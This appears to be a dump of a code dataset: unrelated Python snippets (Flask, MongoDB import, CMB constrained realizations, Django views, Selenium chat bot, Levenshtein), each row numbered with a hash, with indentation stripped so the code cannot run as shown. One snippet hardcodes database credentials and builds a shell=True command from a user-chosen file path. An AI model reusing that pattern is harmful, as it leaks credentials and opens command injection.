return render_template('historia_clinica/edit_antecedentes_familiares.html', antecedentes_familiares=antecedentes_familiares, paciente=paciente, title='Editar antecedentes familiares') |
24,691 | edd61c744ca35aba67295653836a8c562300c52b | from pymongo import MongoClient
import tkinter as tk
from tkinter import filedialog
import subprocess
file = filedialog.askopenfilename()
subprocess.call(f"mongoimport --uri mongodb+srv://user:user@promessededon.sw4vx.mongodb.net/OpenData_ORE --collection conso_annuel --jsonArray --file {file}", shell=True)
|
24,692 | 4965de7007d783b3bcc0af3987e5b5e2c4cbdd1c | # messenger method (mm) constrained realizations
import numpy as np
import healpy as hp
import support_classes as sc
class ConstrainedRealizations:
def __init__(self, nside, weights_map, lmax_factor=1.5, mask=None):
"""Constrained Realizations has to be initialized with parameters and
the desired mask."""
self.params = sc.Parameters(nside, lmax_factor)
self.weights_map = weights_map
if mask is not None:
self.mask = sc.Mask(mask, nside)
else:
self.mask = sc.Mask(np.ones(self.params.npix))
# set up methods
def set_noise_cov(self, noise_cov):
"""Set noise covariance matrix and calculate quantities for messenger
loop."""
self.check_nside(noise_cov)
self.noise_cov = sc.NoiseCov(noise_cov, self.mask.mask)
try:
self.set_delta()
except:
pass
def set_signal_cov(self, cl, fwhm = None):
"""Set signal cov from Cls and assignt quantities to .signal_cov
atribute"""
if fwhm is not None:
bl = hp.gauss_beam(fwhm,lmax=len(cl)-1)
self.signal_cov = sc.SignalCov(bl**2 * cl, self.params.lmax)
else:
self.signal_cov = sc.SignalCov(cl, self.params.lmax)
try:
self.set_delta()
except:
pass
def set_delta(self):
"""Set delta to generate random filed. Use gen_delta method to generate
delta"""
self.delta = sc.Delta(self.noise_cov.noise_cov, self.signal_cov.cl_inv,
self.mask.mask, self.params.pix_area)
def set_cooling_schedule(self, lamb_0, target_precision, eta=3/4):
"""Set initial parameters to obtain cooling schedule under atribute .cs.
"""
self.cs = sc.CoolingSchedule(lamb_0, eta)
self.cs.set_precision_schedule(target_precision)
# cooling methods/functions
def gen_delta(self):
"""Generate one fluctuation field delta making use of already set
parameters and covariances."""
delta = self.delta.gen_delta(self.mask.good_pix, self.mask.bad_pix,
self.params.nside, self.params.npix)
return delta
def solve_flm(self, tlm, delta, lamb, target_precision, wf = False):
"""Solve for flm for a specific delta, lambda and target precision"""
flm = np.ones(len(tlm))
while True:
flm_i = np.copy(flm)
flm, tlm = self.do_transform(delta, tlm, lamb, wf)
conv = np.linalg.norm(flm-flm_i, ord=2)\
/ np.linalg.norm(flm_i, ord=2)
if conv < target_precision:
return flm, tlm
def do_transform(self, delta, tlm, lamb, wf = False):
"""Do one iteration of the basis transform for the wiener filter"""
sl, tau, noise_cov = \
self.signal_cov.signal_cov, self.noise_cov.tau, \
self.noise_cov.noise_cov
good_pix, bad_pix = self.mask.good_pix, self.mask.bad_pix
weights_map = self.weights_map
pix_area, lmax, nside = self.params.pix_area, self.params.lmax, \
self.params.nside
if wf:
flm, tlm = \
wf_field_trnsfrm(delta, tlm, lamb, sl, tau, noise_cov, good_pix,
bad_pix, weights_map, pix_area, lmax, nside)
else:
flm, tlm = \
field_trnsfrm(delta, tlm, lamb, sl, tau, noise_cov, good_pix,
bad_pix, weights_map, pix_area, lmax, nside)
return flm, tlm
def gen_constrained_realization(self, delta_fix=None):
"""Generate one fluctation field, which added to a wiener filtered map
gives a constrained realization."""
# set up fields
if delta_fix is None:
delta = self.gen_delta()
else:
delta = delta_fix
t = np.copy(delta)
tlm = hp.map2alm(t*self.weights_map, self.params.lmax, iter=0)
# get cooling schedule
lamb_list = self.cs.lamb_list
eps_list = self.cs.eps_list
for i in range(len(lamb_list)):
flm, tlm = self.solve_flm(tlm, delta, lamb_list[i], eps_list[i])
return flm
def wiener_filter_data(self, data):
"""Outputs wiener filtered data in ell space, done with the messenger
method, given the input data."""
# set up fields
t = np.copy(data)
t[self.mask.bad_pix] = hp.UNSEEN
t[self.mask.good_pix] *= self.weights_map[self.mask.good_pix]
tlm = hp.map2alm(t, self.params.lmax, iter=0)
# get cooling schedule
lamb_list = self.cs.lamb_list
eps_list = self.cs.eps_list
for i in range(len(lamb_list)):
xlm, tlm = self.solve_flm(tlm, data, lamb_list[i], eps_list[i], wf = True)
return xlm
# helper functions
def check_nside(self, m):
assert hp.get_nside(m) == self.params.nside, \
"Wrong resolution, NSIDE should be {}.".format(self.params.nside)
def field_trnsfrm(delta, tlm, lamb, sl, tau, noise_cov, good_pix, bad_pix,
weights_map, pix_area, lmax, nside):
"""Transforms fluctuation field to pixel space and back given constrained
realization, cooling schedule parameters and random field delta"""
flm = (sl*tlm)/(sl+lamb*pix_area*tau)
f = hp.alm2map(flm, nside, lmax, verbose=False)
t = np.zeros(hp.nside2npix(nside))
t[bad_pix] = lamb*tau*delta[bad_pix]+f[bad_pix]
t[good_pix] = \
(lamb*tau*noise_cov[good_pix]*delta[good_pix] +
(noise_cov[good_pix] - tau)*f[good_pix])/(noise_cov[good_pix] +
(lamb-1)*tau)
tlm = hp.map2alm(t*weights_map, lmax, iter=0)
return flm, tlm
def wf_field_trnsfrm(data, tlm, lamb, sl, tau, noise_cov, good_pix, bad_pix,
weights_map, pix_area, lmax, nside):
"""Transforms messenger field to pixel space and back given data and
cooling schedule parameters"""
xlm = (sl*tlm)/(sl+lamb*pix_area*tau)
x = hp.alm2map(xlm, nside, lmax, verbose=False)
t = np.zeros(hp.nside2npix(nside))
t[bad_pix] = x[bad_pix]
t[good_pix] = \
(lamb*tau*data[good_pix] +
(noise_cov[good_pix] - tau)*x[good_pix])/(noise_cov[good_pix] +
(lamb-1)*tau)
tlm = hp.map2alm(t*weights_map, lmax, iter=0)
return xlm, tlm
|
24,693 | 08a4c479ede4260f00e25b0d14387c912c0ec942 | class Book():
def __init__(self,title,author,pages_num):
self.title = title
self.author = author
self.pages_num = pages_num
self.current_page = 0
self.is_open = False
def open(self):
self.is_open = True
def close(self):
self.is_open = False
def read(self):
if self.is_open == True:
print('Czytasz stronę', self.current_page)
def next_page(self):
if self.is_open == True:
self.current_page +=1
def previous_page(self):
if self.is_open == True:
self.current_page -=1
def book_status(self):
print(f'''
Nazwa: {self.title}
Autor: {self.author}
Ilosc stron {self.pages_num}
Biezaca strona {self.current_page}''')
|
24,694 | 41d1b45edda629a6b3e7319a8a20e0de7dece848 | import numpy as np
import os
import shutil
import re
# #############################################################################
# ############### Comandos de interés de Lectura ##############################
# #############################################################################
# Abre archivo en modo lectura
archivo = open('MANN_a9.clq.txt','r')
# Lectura linea por linea | linea[0] == primer caracter
linea = archivo.readline()
# Localizamos la linea que contiene el string deseado
re.search('Graph Size:',linea)
# Partición de linea por caracter
linea = linea.split(',')
# Filtrado por enteros
size = int(re.sub("\D","",linea[0]))
# Devuelve una copia del string eliminando los caracteres indicados. Default espacio.
line = line.rstrip()
# Filtrado mediante expresion regular
re.findall('[0-9]+',line)
# Cierre de fichero
archivo.close()
# #############################################################################
# ############### Comandos de interés de Escritura ############################
# #############################################################################
# In this file we have the methods to parse the input file
def savePFile(filename, sol):
if not os.path.exists(filename):
os.makedirs(filename)
shutil.rmtree(filename)
f = open(filename, "w+")
f.write(str(sol[0]) + '\n')
for split in sol[1]:
f.write(str(split[0][0]) + ' ' + str(split[0][1]) + ' ' + str(split[1][0]) + ' ' + str(split[1][1]) + '\n')
|
24,695 | 9edf606bb842349580dfe8fe72134986911a7133 | from braces.views import SelectRelatedMixin
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.models import User
from django.views import generic
class Details(LoginRequiredMixin, SelectRelatedMixin, generic.ListView):
model = 'user'
select_related = ('profile', )
template_name = 'ams/settings/setting.html'
def get_object(self, queryset=None):
return self.request.user
def get_queryset(self):
return User.objects.all()
class AllUsers(LoginRequiredMixin, generic.DetailView):
template_name = 'ams/settings/setting.html'
def get_queryset(self):
return User.objects.all()
|
24,696 | 803574486fe775727573abe689063d685151ef6c | friends=["vinayak","shubham","gopal","sagar",5]
numbers=[10,30,20,'50,40']
print(friends)
print(friends[2])
print(friends[0:4])
print(friends[2])
print(friends[2])
print(friends[2])
|
24,697 | 7f09f7f1ac911d04ba74cd702933b21ff6fed2be | from threading import Thread, Event
import time
from queue import Queue
class LerMensagens(Thread):
def __init__(self,evento, infos,driver):
Thread.__init__(self)
self.sair = 0
self.infos_uteis = infos
self.evento = evento
self.driver = driver
def run(self):
tam = 0
while True:
time.sleep(0.4)
msgs = self.driver.find_elements_by_xpath('//div[@id="chat-history-container"]/ul/li')
if tam < len(msgs):
tam = len(msgs)
p = msgs[len(msgs)-1].find_elements_by_tag_name('p')
if(p[1].text.upper().startswith('!XTO ')):
menu = p[1].text.split(" ")
del(menu[0])
menu_string = " ".join(menu)
if menu_string.upper().startswith("PLAY"):
opcao = menu_string.split(" ")
self.infos_uteis.put(opcao)
self.evento.set()
elif menu_string.upper().startswith("SKIP"):
opcao = menu_string.split(" ")
self.infos_uteis.put(opcao)
self.evento.set()
elif menu_string.upper().startswith("EXIT"):
opcao = menu_string.split(" ")
self.infos_uteis.put(opcao)
self.evento.set()
elif menu_string.upper().startswith("LISTA"):
opcao = menu_string.split(" ")
self.infos_uteis.put(opcao)
self.evento.set()
elif menu_string.upper().startswith("HELP"):
opcao = menu_string.split(" ")
self.infos_uteis.put(opcao)
self.evento.set()
|
24,698 | 0c82940ae09bc97baf7e9c58f9faaf75d785458a |
classmates = ['Michael','Bob','Tracy']
len(classmates)
classmates[0]
classmates[-1]
classmates.append('Adam')
classmates.insert(1,'Jack')
classmates.pop()
classmates.pop(1)
classmates[1] = 'Sarah'
L = ['Apple',123,True]
s = ['python','java',['asp','php'],'scheme']
len(s)
|
24,699 | 57f13e8be4924f96b19f8ccd113b9d8295e5a142 |
class Levenshtein():
def __init__(self,p1,p2):
self.p1 = p1
self.p2 = p2
def distance(self):
m = [[(i if j==0 else (j if i==0 else 0)) for i in range(len(self.p1)+1)] for j in range(len(self.p2)+1)]
for i in range(1,len(self.p1)+1):
for j in range(1,len(self.p2)+1):
m[j][i] = min(m[j-1][i-1]+int(not(self.p1[i-1] == self.p2[j-1])),m[j][i-1]+1,m[j-1][i]+1)
return m[-1][-1]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.